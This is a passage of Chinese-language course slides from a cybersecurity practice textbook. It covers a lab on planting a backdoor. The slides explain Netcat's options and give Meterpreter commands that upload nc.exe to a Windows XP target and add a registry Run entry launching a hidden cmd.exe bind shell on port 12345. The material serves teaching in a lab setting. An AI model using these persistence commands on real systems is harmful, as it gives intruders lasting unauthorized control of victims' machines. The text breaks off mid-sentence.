《网络空间安全技术实践教程》课件15.1课件

第四篇渗透攻击测试实验篇第十五章漏洞利用实验15.1Netcat利用实验网络空间安全技术实践教程115.1Netcat利用实验实验目的：

熟练掌握Netcat工具的使用以及利用Meterpreter和Netcat在目标系统留取后门的流程。网络空间安全技术实践教程215.1Netcat利用实验实验原理： Netcat是一款用于发送和接收TCP和UDP流量的工具，它既可以以服务器模式来运行，也可以以客户端模式来运行。Netcat的功能十分强大，被人们称作“瑞士军刀”，它可以用来登录远程服务（类似于Telnet），在计算机之间传递文件，执行端口扫描，进行即时通信，搭建简单的服务器等等。网络空间安全技术实践教程315.1Netcat利用实验实验原理：

网络空间安全技术实践教程4连接到服务器： nc[-options]hostnameport[s][ports]...监听或入站： nc-l-pport[-options][hostname][port]常用参数：

-d后台隐藏运行（仅适用于Windows）

-eprogram建立连接后执行的程序

-l监听状态（连接断开后监听停止）

-L监听状态（仅适用于Windows，连接断开后仍保持监听）

-pport本地端口号

-uUDP模式

-v显示详细信息（-vv可显示更详细的信息）

-wsecs设置时延

-z零I/O模式（用于端口扫描）15.1Netcat利用实验实验要点说明：（实验难点说明）Meterpreter的使用Netcat的使用网络空间安全技术实践教程515.1Netcat利用实验实验准备：（实验环境，实验先有知识技术说明）KaliLinuxNetcat（Windows版本）WindowsXP（靶机）网络空间安全技术实践教程615.1Netcat利用实验实验步骤：（1）在留取后门之前，首先要获得目标系统的控制权。假设我们已经使用Metasploit对目标计算机完成了漏洞利用并获取了一个Meterpreter的shell，我们可以使用该shell与目标计算机进行交互。网络空间安全技术实践教程715.1Netcat利用实验实验步骤：（2）将Netcat程序上传到目标计算机上：meterpreter>uploadnc.exeC:\\WINDOWS\\system32网络空间安全技术实践教程815.1Netcat利用实验实验步骤：（3）使用regsetval命令将Netcat写入注册表的启动项：meterpreter>regsetval-kHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run-vNetcat-d'C:\WINDOWS\system32\nc.exe-Ldp12345-ecmd.exe‘网络空间安全技术实践教程915.1Netcat利用实验实验步骤：（4）使用Netcat登陆目标计算机上的后门进行验证。网络空间安全技术实践教程1015.1Netcat利用实验实验要求：使用Metasploit和Netcat工具在Windows系统和Linux系统上留取后门。网络空间安全技术实践教程1115.1Netcat利用实验实验扩展要求：对Windows系统和Linu